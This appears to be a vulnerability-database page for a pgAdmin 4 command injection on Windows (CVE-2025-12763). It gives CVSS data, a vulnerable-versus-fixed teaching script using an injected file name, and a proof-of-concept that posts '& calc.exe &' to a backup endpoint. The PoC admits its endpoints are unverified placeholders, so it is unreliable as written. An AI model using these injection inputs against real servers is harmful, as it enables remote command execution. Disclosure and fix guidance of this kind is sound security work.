Security Vulnerability Report
CVE-2025-12763 CVSS 6.8 MEDIUM

CVE-2025-12763

Published: 2025-11-13 13:15:45
Last Modified: 2025-12-01 20:15:50
Source: f86ef6dc-4d3a-42ad-8f28-e6d5547a5007

Description

pgAdmin 4 versions up to 9.9 are affected by a command injection vulnerability on Windows systems. This issue is caused by the use of shell=True during backup and restore operations, enabling attackers to execute arbitrary system commands by providing specially crafted file path input.
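The pattern the advisory describes, shown as an added example that is not pgAdmin's own code: a backup routine that interpolates the user-supplied file path into a shell command (shell=True) beside the hardened form that passes an argv list with no shell, plus an allow-list path check as defense in depth. The dump tool is a stand-in (a tiny Python one-liner) so the script runs offline; the hostile path, BACKUP_DIR and the function names are constructed for this example. The command separator is chosen per platform because shell=True means cmd.exe on Windows, where '&' separates commands, and sh elsewhere, where ';' does.

```python
import os
import re
import subprocess
import sys

# Constructed example input: a "file name" an attacker could submit to the
# backup dialog. cmd.exe (Windows) splits commands on '&', POSIX sh on ';'.
SEPARATOR = "&" if os.name == "nt" else ";"
MALICIOUS_PATH = f"backup.dump {SEPARATOR} echo INJECTED"

# Stand-in for pg_dump so the example runs anywhere: prints its last argument,
# which is where the backup file path ends up.
FAKE_DUMP_TOOL = [sys.executable, "-c", "import sys; print(sys.argv[-1])"]

# Assumed backup directory for the path check (need not exist).
BACKUP_DIR = os.path.realpath(os.path.join(os.getcwd(), "backups"))


def backup_vulnerable(file_path):
    """Vulnerable form: the path is spliced into one string that a shell
    parses, so shell metacharacters in it become additional commands."""
    cmd = f'"{FAKE_DUMP_TOOL[0]}" -c "{FAKE_DUMP_TOOL[2]}" --file={file_path}'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def backup_fixed(file_path):
    """Hardened form: argv list and shell=False. The whole path, metacharacters
    included, reaches the tool as a single literal argument."""
    argv = FAKE_DUMP_TOOL + [f"--file={file_path}"]
    result = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return result.stdout.splitlines()


def validate_backup_path(user_path):
    """Defense in depth, independent of the shell fix: accept only a plain
    file name made of allow-listed characters that resolves inside BACKUP_DIR.
    Returns the absolute path to use; raises ValueError otherwise."""
    if not re.fullmatch(r"[A-Za-z0-9._-]+", user_path):
        raise ValueError(f"rejected file name: {user_path!r}")
    full = os.path.realpath(os.path.join(BACKUP_DIR, user_path))
    if os.path.commonpath([BACKUP_DIR, full]) != BACKUP_DIR:
        raise ValueError(f"path escapes backup directory: {user_path!r}")
    return full


if __name__ == "__main__":
    print("shell=True  ->", backup_vulnerable(MALICIOUS_PATH))
    print("argv list   ->", backup_fixed(MALICIOUS_PATH))
    for candidate in ("backup.dump", MALICIOUS_PATH, ".."):
        try:
            print("accepted    ->", validate_backup_path(candidate))
        except ValueError as err:
            print("rejected    ->", err)
```

With shell=True the injected `echo INJECTED` runs as a second command; with the argv list the dump tool simply receives a file name containing a space, a separator and two words. Note that shlex.quote is not a substitute for dropping the shell here: it quotes for POSIX sh and does nothing useful for cmd.exe, which is the shell behind shell=True on the affected Windows builds.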

CVSS Details

The header score is the secondary (CNA-supplied) assessment. The NVD primary assessment in the record below rates the issue higher because it requires no privileges (PR:N rather than PR:H); both are reproduced here.

CVSS Score (secondary, source f86ef6dc-4d3a-42ad-8f28-e6d5547a5007)
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS Score (primary, NVD)
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Weakness
CWE-78 (Improper Neutralization of Special Elements used in an OS Command)

Configurations (Affected Products)

cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:* - VULNERABLE (all versions before 9.10)
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - platform condition (the flaw is reachable only when pgAdmin 4 runs on Windows; Windows itself is not the vulnerable product)
pgAdmin 4 <= 9.9 (Windows builds); 9.10 and later are outside the affected range

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-12763 PoC - pgAdmin 4 Command Injection on Windows

This PoC demonstrates the command injection vulnerability in pgAdmin 4's
backup/restore functionality.

Note: the endpoint paths and JSON field names used below are placeholders
chosen by the PoC author; they have not been verified against the pgAdmin 4
source and must be adjusted to the backup API of the target build.
"""
import requests

# Configuration
TARGET_URL = "http://target-server:5050"
USERNAME = "admin"
PASSWORD = "admin_password"


def exploit_command_injection():
    """
    Exploit the command injection vulnerability in pgAdmin 4 by providing a
    malicious file path during a backup operation.
    """
    # Login to pgAdmin 4
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/authenticate/login"
    login_data = {"username": USERNAME, "password": PASSWORD}
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Malicious payload - injects a calc.exe command via the file path.
    # shell=True on Windows runs the command through cmd.exe, where '&' (not
    # ';') separates commands. In a real attack this could be a reverse shell
    # or any other command.
    malicious_path = "& calc.exe &"

    # Trigger a backup operation with the malicious file path
    backup_url = f"{TARGET_URL}/api/backup"
    backup_data = {
        "filepath": malicious_path,
        "database": "target_db",
        "format": "custom",
    }
    try:
        response = session.post(backup_url, json=backup_data)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    # An accepted request does not by itself prove execution; confirm on the
    # target (for example, that calc.exe was started).
    if response.status_code == 200:
        print("[+] Backup request accepted - check the target for calc.exe")
        return True
    print(f"[-] Request failed with status: {response.status_code}")
    return False


if __name__ == "__main__":
    print("CVE-2025-12763 - pgAdmin 4 Command Injection PoC")
    print("=" * 50)
    exploit_command_injection()

References

https://github.com/pgadmin-org/pgadmin4/issues/9323 (Issue Tracking, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12763", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2025-11-13T13:15:44.777", "lastModified": "2025-12-01T20:15:49.517", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "pgAdmin 4 versions up to 9.9 are affected by a command injection vulnerability on Windows systems. This issue is caused by the use of shell=True during backup and restore operations, enabling attackers to execute arbitrary system commands by providing specially crafted file path input."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:*", "versionEndExcluding": "9.10", 
"matchCriteriaId": "869DC8C4-E456-4D31-964B-96D4B9B8F4A2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://github.com/pgadmin-org/pgadmin4/issues/9323", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}